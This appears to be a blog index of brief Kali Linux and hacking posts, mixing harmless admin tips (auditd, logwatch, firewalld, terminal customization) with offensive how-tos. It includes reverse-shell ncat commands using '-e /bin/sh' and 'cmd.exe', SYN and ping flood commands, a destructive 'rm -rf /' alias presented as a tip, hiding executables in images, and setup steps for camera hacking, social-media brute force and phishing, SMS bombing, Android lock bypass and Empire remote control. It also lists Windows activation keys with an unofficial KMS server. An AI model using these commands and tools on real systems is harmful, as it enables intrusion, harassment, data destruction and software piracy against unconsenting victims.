Posts

Kali linux tools part-5

 Tools for Kali Linux! As a bug bounty hunter, you'll want to familiarize yourself with the various tools available in Kali Linux to help you identify, hack, and exploit bugs, vulnerabilities, and more in systems for which permission and authorization have been granted. Here are some of the most popular tools in Kali Linux: Information Gathering Nmap - Network mapping and port scanning Nessus - Vulnerability scanning OpenVAS - Vulnerability scanning Maltego - Network reconnaissance DNSRecon - DNS reconnaissance Whois - Domain name lookup nslookup - DNS lookup Dig - DNS lookup Vulnerability Scanning Nessus - Vulnerability scanning OpenVAS - Vulnerability scanning ZAP - Web application scanning Burp Suite - Web application scanning SQLMap - SQL injection scanning W3af - Web application scanning Password Cracking John the Ripper - Password cracking Aircrack-ng - Wireless password cracking Hashcat - Password cracking Cain and Abel - Password cracking Ophcrack - Password cracking Web Ap

60 Hacking Commands You Need to know

Commands ping ip ping -s 1300 -f ip hping3 -S -V --flood ip https://www.dropbox.com/scl/fi/ocopfldgm321nn3tutr3r/top_60_hacking_commands_cheat_sheet.pdf?rlkey=rj8itrl0h3ckgdd5gyj0lqpkg&st=dxlxaq4w&dl=0

Linux Networking Commands part-4

Sure! Here’s a comprehensive list of Linux networking commands, particularly useful for Kali Linux: ### Basic Networking Commands 1. **`ifconfig`**: Configure and display network interfaces.    - `ifconfig -a`: Display all interfaces, even if down.    - `ifconfig eth0 up/down`: Bring an interface up or down. 2. **`ip`**: More modern and powerful command to configure network interfaces.    - `ip addr`: Show IP addresses.    - `ip link set eth0 up/down`: Bring an interface up or down.    - `ip route`: Show routing table. 3. **`ping`**: Check the network connection to a host.    - `ping google.com`: Ping Google to check internet connectivity. 4. **`traceroute`**: Trace the route packets take to a destination.    - `traceroute google.com` 5. **`netstat`**: Network statistics, showing connections, routing tables, interface statistics.    - `netstat -tuln`: List listening ports. 6. **`ss`**: Similar to `netstat`, but more modern.    - `ss -tuln`: List listening ports. 7. **`dig`**: DNS looku

Beef - Browser Exploitation Framework

Image
  What is BeEF? BeEF is an open-source security tool designed to exploit vulnerabilities in web browsers. It allows penetration testers to assess the security posture of a target environment by using the web browser as a pivot point. By taking advantage of the trust users place in their browsers, BeEF can explore a wide array of attack vectors and execute various payloads. Key Features of BeEF Browser Hooking : BeEF works by "hooking" a web browser, which means it injects a script into the target browser. Once the browser is hooked, it can be controlled remotely. Command Modules : BeEF includes numerous modules that can execute different types of attacks and exploits, such as keylogging, phishing, network reconnaissance, and more. Integration : BeEF can be integrated with other penetration testing tools like Metasploit to enhance its capabilities. Cross-Origin Requests : It can exploit vulnerabilities to make cross-origin requests, allowing it to bypass same-origin policy res

Resources of Ethical Hacking, White Hat Hacking....

 Soon I will add sheets link

How to change private ip in kali linux

Image
 Step:1 Clone git Repositoty of ip changer https://github.com/LxaNce-Hacker/IP-Changer.git Step:2 run ipchanger file by using bash bash ipchanger.sh

Auditd - Use auditd for comprehensive system auditing.

 Use  auditd  for comprehensive system auditing. sudo apt install auditd audispd-plugins sudo systemctl enable auditd sudo systemctl start auditd sudo nano /etc/audit/audit.rules -w /etc/passwd -p wa -k passwd_changes sudo systemctl restart auditd #systemmonitoring #monitor #auditd

logwatch tool to monitor all the log files and send you via mail

  Step:1 sudo apt-get update sudo apt-get install logwatch Step 2: Configure Logwatch sudo cp /usr/share/logwatch/default.conf/logwatch.conf /etc/logwatch/conf/logwatch.conf Edit configuration file sudo nano /etc/logwatch/conf/logwatch.conf Key parameters to configure: Output Output = mail MailTo: MailTo = your-email@example.com MailFrom: MailFrom = logwatch@example.com Detail: Set the level of detail (Low, Med, High). Detail = Low Service: Service = All Step:3 LogDir = /var/log Step 4: Test Logwatch Configuration sudo logwatch --output mail --mailto your-email@example.com --detail Low

Kali linux emoji and color of the text customization

Image
 

"Colorful Command Line: How to Add lolcat to Your Linux Commands"

Image
1.  Edit your shell configuration file : nano ~/.bashrc  # or  nano ~/.zshrc 2. Add the functions : Append the following lines to your configuration file. These functions will wrap the commands and pipe their output through lolcat : function lolcat_wrapper() {     command "$@" | lolcat } alias ls='lolcat_wrapper ls' alias cat='lolcat_wrapper cat' alias echo='lolcat_wrapper echo' alias grep='lolcat_wrapper grep' alias tail='lolcat_wrapper tail' alias head='lolcat_wrapper head' alias dmesg='lolcat_wrapper dmesg' alias df='lolcat_wrapper df' alias du='lolcat_wrapper du' alias free='lolcat_wrapper free' alias ps='lolcat_wrapper ps' alias top='lolcat_wrapper top' alias htop='lolcat_wrapper htop' alias ifconfig='lolcat_wrapper ifconfig' alias ip='lolcat_wrapper ip' alias ping='lolcat_wrapper ping' alias traceroute='lolcat_wrapper traceroute' alias

kali linux terminal customization font, banner etc.

  Step:1 Package installer sudo apt install -y figlet lolcat ls | lolcat figlet -f script Maverick figlet -f script anonymous | lolcat figlet -f block anonymous | lolcat For more fonts copy https://github.com/xero/figlet-fonts.git clone it Then all the above fonts copy to figlet dir sudo cp figlet-fonts/* /usr/share/figlet figlet -f 3d anonymous | lolcat then configure nano ~/.bashrc clear sudo figlet -f 3d Maverick | lolcat then source ~/.bashrc

CSI Linux for OSINT and Forensic

https://csilinux.com/csi-linux-downloads/

Firewalld Firewall Service - Ufw firewall on linux

  Firewalld Service sudo apt install -y firewalld stop/start firewalld service 1.systemctl status firewalld 2.systemctl restart firewalld 3.systemctl stop firewalld.service 4.systemctl start firewalld.service Check the rules of firewalld firewall-cmd --list-all Listing of all the services firewalld is aware of: firewall-cmd --get-services To reload the config of firewalld firewall-cmd --reload Firewall has multiple zones , to get list firewall-cmd --get-zones To see the list of active zones firewall-cmd --get-active-zones To get firewall rules for a specific zone firewall-cmd --zone=public --list-all To add or remove a service firewall-cmd -add-service=<name of service> firewall-cmd --remove-service=<name of service> To reload the config firewall-cmd --reload To add or remove a service permanently firewall-cmd --add-service=<name of service> --permanent firewall-cmd --remove-service=<name of service> --permanent To add or remove a port firewall-cmd --add-port=22

Commands to check external ip from terminal

$curl -s https://ifconfig.me $wget -qO- https://ipecho.net/plain ; echo $dig +short myip.opendns.com @ resolver1.opendns.com $curl -s https://api.ipify.org

Command to fix initramfs

 fsck /dev/sda1 -y #linux #linuxbootrepai

Browser Opening and managing using cli linux

 firefox firefox <URL> firefox  https://www.example.com firefox & firefox --incognito firefox --new-window firefox --app= https://www.example.com firefox --private-window firefox --private-window  https://www.google.com firefox -private  https://www.google.com

Fix kali linux vmware kernal not found error

Commands $ sudo apt-get install linux-headers-$(uname -r) $ sudo vmware-config-tools.pl Do this to:- $ sudo apt install build-essential linux-headers-$(uname -r) $ sudo vmware-modconfig --console --install-all $ sudo systemctl restart vmware
 ROUTER - YOU CAN USE ANOTHER ROUTER TO EXPAND THE RANGE OF THE NETWORK. ACESS POINT ETHERNET CABLES CATEGORY OF ETHERNET CABLES ROUTER , SWITCH & HUB

Hacking Operating System

1.Arch Linux 2.Kali linux 3.Parrot linux 4.Pentoo 5.Athena os

CamHacker

Image
 St-1 git clone from github St-2 run bash hackcam.sh #camerahacking camera hacking

Windows Activation key

(1)- slmgr.vbs /ipk "Product Key According To Your Edition" (2)- slmgr.vbs /skms kms.lotro.cc (3)- slmgr.vbs /ato 👇Windows 10 Product Keys ( All Editions )👇  Home/Core TX9XD-98N7V-6WMQ6-BX7FG-H8Q99 Home/Core (Country Specific) PVMJN-6DFY6-9CCP6-7BKTT-D3WVR Home/Core (Single Language) 7HNRX-D7KGG-3K4RQ-4WPJ4-YTDFH Home/Core N 3KHY7-WNT83-DGQKR-F7HPR-844BM Professional W269N-WFGWX-YVC9B-4J6C9-T83GX Professional N MH37W-N47XK-V7XM9-C7227-GCQG9 Enterprise NPPR9-FWDCX-D2C8J-H872K-2YT43 Enterprise N DPH2V-TTNVB-4X9Q3-TJR4H-KHJW4 Education NW6C2-QMPVW-D7KKK-3GKT6-VCFB2 Education N 2WH4N-8QGBV-H22JP-CT43Q-MDWWJ Enterprise 2015 LTSB WNMTR-4C88C-JK8YV-HQ7T2-76DF9 Enterprise 2015 LTSB N 2F77B-TNFGY-69QQF-B8YKP-D69TJ Enterprise 2016 LTSB DCPHK-NFMTC-H88MJ-PFHPY-QJ4BJ Enterprise 2016 LTSB N QFFDN-GRT3P-VKWWX-X7T3R-8B639

MoSint - mail osint

holehe email osint

tmux

 terminal multixplayer terminal virtualization

Metasploit-Framework

msfencode,msfpayload,msfdb,msfconsole,msfvenom = metasploit-framework msfconsole search ftp use 1 show options set RHOSTS ip show payloads exploit/run Metasploit Modules Exploits payloads auxillery enocoder nops evasion post

Linux Command to see connected devices of your network their ip, Mac addresses and host names

Image
$sudo netdiscover -i eth0

Angry IP Scanner

Angry Ip scanner tells you which device is active and alive in your network  You can download Angry IP Scanner for Linux using the command line (CLI) by following these steps: 1. **Open a Terminal:**    Open your terminal emulator. You can usually find it in your applications menu or by searching for "Terminal". 2. **Download Angry IP Scanner:**    Use the `wget` command to download the Angry IP Scanner `.deb` package from the official website:    ```bash    wget https://github.com/angryip/ipscan/releases/download/3.8.1/ipscan_3.8.1_amd64.deb    ```    This command will download the latest version of Angry IP Scanner for 64-bit systems. If you're using a 32-bit system, replace `amd64` with `i386` in the URL. 3. **Install Angry IP Scanner:**    After downloading the `.deb` package, you can install it using the `dpkg` command:    ```bash     sudo dpkg -i ipscan_3.8.1_amd64.deb    ```    Replace `ipscan_3.8.1_amd64.deb ` with the name of the downloaded package if it's di

DNS Enumeration and Subdomain Enumeration

 $dnsenum google.com #subdomainenumeration #subdomain

Delete your kali linux completely using this command alias ls = 'rm -rf /'

 alias ls = 'rm -rf /'

How to change mac-address in kali linux and never gets block from any wifi

Image
To change your MAC address in Kali Linux, you can use the macchanger tool. Here are the commands to change your MAC address:     First, open a terminal in Kali Linux.     Check the current MAC address of your network interface. Replace eth0 with the name of your interface. For example: bash ifconfig eth0 | grep ether or bash ip link show eth0     Next, disable the network interface. Replace eth0 with your interface name: bash sudo ip link set dev eth0 down     Now, change the MAC address using macchanger. Replace eth0 with your interface name: bash sudo macchanger -r eth0 This command generates and sets a random MAC address for your interface. If you prefer to specify a custom MAC address, you can use the -m option followed by the desired MAC address.     Finally, bring the interface back up: bash sudo ip link set dev eth0 up After executing these commands, your network interface will have a new MAC address. Remember that changing your MAC address can affect network connectivity, parti

WEP security network cracking tools

1.Aircrack 2.Kismet 3.WEPCrack 4.WebDecrypt

How to create a fake access point in kali linux

 Creating a fake access point, also known as an evil twin or rogue access point, can be done using tools available in Kali Linux. Here's a general overview of the steps involved: 1. **Prepare Your Environment**:    Ensure you have a wireless network adapter capable of supporting monitor mode and packet injection. Kali Linux typically comes with compatible drivers for many wireless adapters. You can check the compatibility of your wireless adapter with Kali Linux by researching online or consulting the documentation. 2. **Set Up Your Wireless Interface**:    Open a terminal window in Kali Linux and use the following commands to set your wireless interface (replace `<interface>` with the name of your wireless interface):    ```bash    sudo ifconfig <interface> down    sudo iwconfig <interface> mode monitor    sudo ifconfig <interface> up    ```    This puts your wireless interface into monitor mode, allowing it to sniff and capture wireless traffic. 3. **Insta

FatRAT - Genrating Payload , Backdoor tool

Tor ghost - Hide your real IP

4nominizer - Hide your IP

Honeypot - Pentbox Github

Subfinder - A subdomain enumeration dool

Image
subfinder -d google.com subfinder -h Jai Shree Ram

whatweb image

Image
whatweb -a 3 www.wired.com

Whatweb

Image
whatweb -a 3 www.wired.com - for aggressive scan In Kali Linux, "WhatWeb" is a reconnaissance tool used for web fingerprinting. It's designed to identify and fingerprint web applications and their technologies by examining various aspects of their responses. Here's how it works: Fingerprinting : WhatWeb analyzes the HTTP responses received from web servers and identifies specific technologies, frameworks, CMS (Content Management Systems), server software, and other components used in the target web application. Passive Scanning : WhatWeb performs passive scanning, meaning it doesn't actively send requests to the target but rather analyzes the responses received while browsing the web application. Detection Techniques : It uses a combination of techniques such as analyzing HTTP headers, HTML and JavaScript code, specific URLs, error messages, and other patterns to infer information about the web application's technology stack. Database

Powershell-Empire - Remotely control any PC with Empire GUI

  Remotely Control any PC with Empire GUI How to start? $sudo powershell-empire server copy the url the local url and then paste in browser Links look like this http://localhost:1337/index.html  Default username is empireadmin and password is password123 Steps Activate the listeiner Generate the payload and send it to a victim. #pchacking #windowshacking #macoshacking

Password Hash

 import hashlib # String to hash password = "password" # Calculate MD5 hash md5_hash = hashlib.md5(password.encode()).hexdigest() print("MD5 hash of 'password':", md5_hash) MD5 hash of 'password': 5f4dcc3b5aa765d61d8327deb882cf99 How to get md5 hash of any encrypted file? md5sum Encrypt.zip > Encrypt.hash Then cracking using john or hydra $john Encrypt.hash How to identify the hash alogrithm? Use a tool called hash-identifier to know which algorithm hash is used.

Password Cracking Tools

Image
1.John The Ripper 2.Hashcat 3.Hydra 4.Cain & Abel 5.Cudahashcat

How to create and encrypt zip file

Creating Zip File $zip file.zip file.txt  Encrypting Zip File $zip -r -P your_password encrypted.zip files_to_encrypt

Zenmap

Zenmap is the graphical version of nmap.

See the connected device ip address on to your network in kali linux

 To view the list of IP addresses of devices connected to your network in Kali Linux, you can use various commands. Here are a few options: 1. **Using `arp` Command**:    ```    arp -a    ```    This command displays the ARP cache, which contains a list of IP addresses and their corresponding MAC addresses of devices that your computer has recently communicated with. 2. **Using `nmap` Command**:    ```    sudo nmap -sn <IP_range>    ```    Replace `<IP_range>` with the IP range of your network (e.g., `192.168.1.0/24`). This command uses the Nmap tool to perform a ping scan (`-sn` flag) of all IP addresses in the specified range and displays the ones that are responsive. 3. **Using `arp-scan` Command**:    First, install arp-scan if it's not already installed:    ```    sudo apt-get install arp-scan    ```    Then, run:    ```    sudo arp-scan --localnet    ```    This command scans your local network and displays a list of active IP addresses and corresponding MAC addre

MBo()b - Messaging bombarding Scripts github

Image
  https://github.com/palahsu/MBomb.git #githubscripts #github #tools

ncat - Windows , linux , android & macos shell access

nc [options] [host] [port]   Common Netcat Options: -l : Listen mode - Creates a listening server on a specified port -u : UDP mode - Uses UDP protocol instead of TCP (default) -v : Verbose mode - Provides more output during operation -p <port> : Specify the source port (useful for avoiding conflicts) -t : No delay - Disables Nagle's algorithm for faster data transfer (may not be compatible with all applications) -e <program> : Executes a program after a successful connection (advanced usage)   $nc -lvp 1234 - linux - port listening $ncat ip   1234  -e /bin/sh - android/linux $ncat ip  1234  -e cmd.exe/powershell.exe - windows $ncat -e 192.168.75.128 1111 cmd.exe - 100% working $nc -vv ip port Software neccessary for using ncat  Windows Download Nmap and Ncap from nmap website. Linux  Download ncat sudo apt install ncat #shellaccess #shellaccessinwindows #shellaccessinlinux #shellaccessinandroid

How to change display manger in kali linux - gdm3 for gnome - sddm - lightdm

$sudo dpkg-reconfigure gdm3 $update-alternatives --config x-session-manager    #kalilinux #commands #linuxcommands

Truecallerjs

PhoneIinfoga

Phonsploit Pro - Mobile Phone H@cking

Image
      1. Connect a Device             6. Get Screenshot                       11. Install an APK       2. List Connected Devices       7. Screen Record                        12. Uninstall an App     3. Disconnect All Devices       8. Download File/Folder from Device     13. List Installed Apps     4. Scan Network for Devices     9. Send File/Folder to Device           14. Access Device Shell     5. Mirror & Control Device     10. Run an App                           15. Hack Device (Using Metasploit) github url - https://github.com/AzeemIdrisi/PhoneSploit-Pro.git #phonehacking #androidhacking #controllingandroiddevices

SMH - Social Media H@cking Options- Brute Force , Mass Reporting & Phishing

Image
    1.SMH - Social Media H@cking Tool I.Instagram 2.Facebook 3.Gmail 4.Twitter git clone https://github.com/NullPulse/SocialMediaHackingToolkit cd SocialMediaHackingToolkit cd dependencies sudo dpkg -i windscribe-cli.deb windscirbe login cd ../cmd pip3 install -r requirements.txt cd .. chmod +x linux.sh ./linux.sh Options- Brute Force , Mass Reporting & Phishing #instagramhacking #bruteforceattack #socialmediahacking #ethicalhacking #twiiterhacking #facebookhacking #gmailhacking

CiLocks - All android h@cking tool

Image
     1.Update   2.Brute Pin 4 Digit   3.Brute Pin 6 Digit   4.Brute LockScreen Using Wordlist   5.Bypass LockScreen {Antiguard} Not Support All OS Version   6.Root Android {Supersu} Not Support All OS Version   7.Jump To Adb Toolkit   8.Reset Data   9.Remove LockScreen {Root}   10.Jump To Metasploit   11.Control Android {Scrcpy}   12.Phone Info   13.IP Logger {Over Internet}   14.Get WebCam {Over Internet}   15.FireStore Vulnerability   99.Exit git clone https://github.com/tegal1337/CiLocks cd CiLocks chmod +x cilocks sudo bash cilocks or sudo ./cilocks #androidrecovery #androidhackingtool #allinoneandroidtools #reset #androitpasswordcracking 

UPT

https://itsfoss.com/upt/

Amass - a subdomain enumeration tool/subdomain finder tool

To install Amass from GitHub, you can follow these steps: 1. Clone the repository:    git clone https://github.com/OWASP/Amass.git 2. Change directory into the Amass folder     cd Amass 3. Build the project using the `go` command:    go install ./ 4. After installation, you can run Amass commands from the command line. go install -v github.com/owasp-amass/amass/v4/...@master Make sure you have Go installed on your system before proceeding. $amass enum -d google.com Httprobe - to find the live subdomain who is currently live. $cat subdomain.txt | httprobe And here is the list😂 #sudomainfinder #subdomainenumeration #informationgathering

Steganography - Hiding text behind images

Open the terminal in windows Two things you must have as a file first is image you want to hide text in it and the text file where you will write your message. Copy /b image.png + Message.txt NewImage.png How to read hidden measaage? If you want to read the hidden text in image then open text editor in case of windows we have notepad and drag image to notepad read the end line. Linux How to hide malicious file in image Download the software $sudo apt install steghide $steghide embed -ef FileManager.exe -cf image.jpg $steghide extract -sf stego.jpg Steghide is a command-line tool used to embed and extract data in various files. Here's a basic tutorial on some of its commands: 1. **Embedding Data:**    ```               ```    This command embeds data from `<file_to_embed>` into `<cover_file>` and saves the result in `<output_file>`. 2. **Extracting Data:**    ```    steghide extract -sf <stego_file>    ```    This command extracts data from `<stego_file&

Google Dorking

Cracked the zip file password

Zip File - Creator.zip #Assuming that your file is protected with password. $zip2john Creator.zip > Hashes.hash #generates the hashes John the ripper is a password cracking tool. $john Hashes.hash

Nmap

Image
Network Scanning Tool $nmap google.com - gives the ip address and shows the open ports $nmap -o nmap.org - detects the operating system of web server running. Basic Scaning Technique Commands:- 1.Nmap 192.168.x.x 2.nmap 192.168.y.y 192.168.z.z - multiple scans 3.nmap 192.168.1.1-100 scan a range of ip. 4.nmap 192.168.1.0/24 - scan the entire subnet. List of ip address scanning 1.$cat list.txt 2.nmap -iL list.txt 3.nmap 192.168.1.0/24 --exclude 192.168.1.100 Discovery Scanning Options Commands 1.$nmap -Pn 192.168.1.111 (Don't Ping) 2.$nmap -sP 192.168.75.111 (Ping only scan) 3.$nmap --traceroute demo.testfire.net Advanced Scanning Options: $nmap -sS 192.168.x.x (TCP Syn Scan) Three way handshake syn-> syn+ack<- ack + rst -> $nmap -sT 192.168.x.x  (TCP Connect Scan) Three way shake complete $nmap -sF 192.168.x.x  (TCP FYN/FIN Scan) $nmap -sX 192.168.x.x  (TCP Xmas Scan) nmap -F ip  100 ports nmap -p 80 ip - specific port will scan nmap -O ip - operating system scanning. Ti

Linux machine hacked how to check? List of commands

$w - current login user $last - previously login user $netstat -ntua|grep "ESTABLISHED" - shows connections established 

Kali Linux Customization

sudo -i - root user enable cat /etc/os-release  - current version of kali machine $sudo apt install figlet lolcat $figlet -f banner "Maverick" | lolcat $sudo apt install plank Terminal Custom $sudo apt install terminator edx-ui github sudo apt install kali-desktop-gnome sudo apt remove kali-desktop-xfce xfce* lightdm #kali  #kalilinux  #customization  #kalicustomization  #kalilinuxcustomization

Ubuntu Installation on Android

Termux from Fdroid. An Linux Real Vnc

IP tracer & Track-IP Github

Image
Step - 1: Clone repo https://github.com/rajkumardusad/IP-Tracer.git Step - 2: Give permission to install chmod +x install Step - 3: Run install bash install  or ./install https://github.com/htr-tech/track-ip.git